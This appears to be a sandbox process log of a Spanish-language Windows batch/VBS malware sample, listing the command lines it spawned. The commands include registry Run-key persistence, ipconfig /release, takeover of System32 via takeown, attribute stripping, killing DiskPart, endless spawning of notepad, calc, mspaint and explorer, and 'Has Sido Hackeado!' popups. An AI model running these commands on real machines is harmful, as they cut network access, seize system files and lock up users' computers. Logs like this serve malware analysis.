C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-676887625-1073134067-8410375181794150156-11418564961862864579-165912570391075188"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "437577013392280940-10738306884194125961338202433694962308-12139074161007318137"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\notepad.exe
notepad
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\notepad.exe
notepad
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\notepad.exe
notepad
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-555270786-1787551311-408814385-14607659411204674690118924370114835254711973785691"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\notepad.exe
notepad
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\notepad.exe
notepad
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\notepad.exe
notepad
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\icacls.exe
icacls "C:\Program Files"
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\icacls.exe
icacls "C:\Program Files"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h "C:\Program Files"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h "C:\Program Files"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\calc.exe
calc
